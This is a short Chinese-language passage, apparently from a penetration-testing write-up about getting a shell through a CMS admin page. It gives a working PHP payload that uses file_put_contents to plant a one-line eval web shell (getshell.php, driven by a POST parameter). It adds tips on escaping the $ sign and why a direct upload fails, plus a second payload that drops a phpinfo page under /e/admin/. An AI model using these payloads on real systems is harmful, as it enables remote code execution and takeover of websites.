登录管理员页面:
这里经过多次测试,
直接上传一句话样本文件的话不生效(避坑),
并且$符需要做转义(避坑),否则:
方式1:
php
<?php file_put_contents("getshell.php","<?php @eval(\$_POST[777]); ?>");?>其中,函数file_put_contents():把内容写进一个文件里。(常用函数)
方式2:
php
<?php file_put_contents("getphpinfo.php","<?php phpinfo(); ?>");?>访问x.x.x.x/e/admin/getphpinfo.php:
